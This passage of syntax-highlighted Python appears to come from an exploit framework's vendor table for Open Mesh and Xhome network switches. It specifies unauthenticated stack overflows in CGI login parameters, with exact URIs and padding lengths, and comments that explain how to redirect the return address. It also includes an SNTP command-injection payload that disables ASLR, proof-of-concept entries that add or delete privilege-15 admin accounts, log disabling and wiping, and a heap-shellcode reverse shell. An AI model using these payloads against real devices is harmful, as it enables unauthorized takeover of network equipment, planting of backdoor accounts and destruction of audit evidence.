						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token string">'OpenMESH'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
				<span class="token string">'vendor'</span><span class="token punctuation">:</span> <span class="token string">'Open Mesh, Inc.'</span><span class="token punctuation">,</span>
				<span class="token string">'modulus_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_JSON'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_uri'</span><span class="token punctuation">:</span><span class="token string">'/loginMsg.js'</span><span class="token punctuation">,</span>
				<span class="token string">'xsid'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'xsid_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'log'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Disable and clean logs'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'status'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token comment"># Verify lacking authentication</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
						<span class="token string">'security.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/security.cgi?login'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr=admin&amp;pswrd='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">280</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'datajson.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr=admin&amp;pswrd='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">288</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/sn_httpupload.cgi?'</span><span class="token punctuation">,</span> <span class="token comment"># Including alignment of opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'priv15_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Update running-config (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'add_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'del_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'del_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'SNTP command injection (PoC: disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># &lt;================================</span>
						<span class="token string">'enable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'enable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntpStatus=1&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSntp'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;srvDef=byIp&amp;sntpServer=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;cursntpPort=123&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'check_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;srvDef=byIp&amp;sntpServer=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;cursntpPort=123&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSntpDel'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_query'</span><span class="token punctuation">:</span><span class="token string">'{"":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntpStatus=0&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span> <span class="token comment"># It is vulnerable, but I am not using this authenticated code here :&gt;</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token comment">#</span>
					<span class="token comment"># The stack overflow in 'username' and 'password' at same request are multipurpose.</span>
					<span class="token comment">#</span>

					<span class="token comment">#</span>
					<span class="token comment"># The trick to jump and execute:</span>
					<span class="token comment"># 1. Code: username=[garbage][RA + 0x58000000]&amp;password=[garbage][NULL termination]</span>
					<span class="token comment"># 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary</span>
					<span class="token comment"># 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)</span>
					<span class="token comment"># 4. We will also feed required function parameters, by adding them to '_CMD_'</span>
					<span class="token comment">#</span>
					<span class="token comment"># Bonus: Disable and clean logs</span>
					<span class="token comment">#</span>
					<span class="token comment">#</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: del priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>

						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/conf_tmp/check'</span><span class="token punctuation">,</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>

					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable/Clean logs)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>

						<span class="token string">'log_settings_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;en=0'</span><span class="token punctuation">,</span>				<span class="token comment"># Disable Logging CMD</span>
						<span class="token string">'log_settings_set_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging SIGSEGV ?</span>

						<span class="token string">'log_ramClear_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;ta=0'</span><span class="token punctuation">,</span>					<span class="token comment"># Clean RAM CMD</span>
						<span class="token string">'log_ramClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean RAM SIGSEGV ?</span>

						<span class="token string">'log_fileClear_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;ta=1'</span><span class="token punctuation">,</span>				<span class="token comment"># Clean FILE log CMD</span>
						<span class="token string">'log_fileClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean FILE log SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntp_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sa=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;sp=123'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_check'</span><span class="token punctuation">:</span><span class="token string">'&amp;sa=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/conf_tmp/check`&amp;sp=123'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntpDel_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sa=+&amp;sp=123'</span><span class="token punctuation">,</span>				<span class="token comment"># CMD</span>

						<span class="token string">'sys_timeSettings_set_cmd_enable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sn=1'</span><span class="token punctuation">,</span>	<span class="token comment"># Enable CMD</span>
						<span class="token string">'sys_timeSettings_set_cmd_disable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sn=0'</span><span class="token punctuation">,</span>	<span class="token comment"># Disable CMD</span>
						<span class="token string">'sys_timeSettings_set_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/conf_tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token comment">#</span>
					<span class="token comment"># Used for both 'heap' and 'stack'</span>
					<span class="token comment">#</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/security.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/security.cgi?logout'</span><span class="token punctuation">,</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'build=NOP&amp;heap=NOP&amp;to=NOP&amp;higher=addresses&amp;usr=admin&amp;pswrd=_PWDNOP_RA_START&amp;shellcode=_USRNOP_SHELLCODE'</span><span class="token punctuation">,</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span> <span class="token comment"># False = use Heap, and there are no ASLR</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token string">'Xhome'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'vendor'</span><span class="token punctuation">:</span> <span class="token string">'Xhome'</span><span class="token punctuation">,</span>
				<span class="token string">'modulus_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_JSON'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'xsid'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'xsid_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'clear'</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username=USERNAME&amp;password=PASSWORD&amp;login=1'</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=547'</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=3'</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'log'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Disable and clean logs'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'LOGGING_SERVICE=0&amp;cmd=5121'</span><span class="token punctuation">,</span>
						<span class="token string">'status'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_query'</span><span class="token punctuation">:</span><span class="token string">'cmd_5132=Clear+file+messages'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_query'</span><span class="token punctuation">:</span><span class="token string">'cmd_5132=Clear+buffered+messages'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token comment"># Verify lacking authentication</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'httpuploadbakcfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
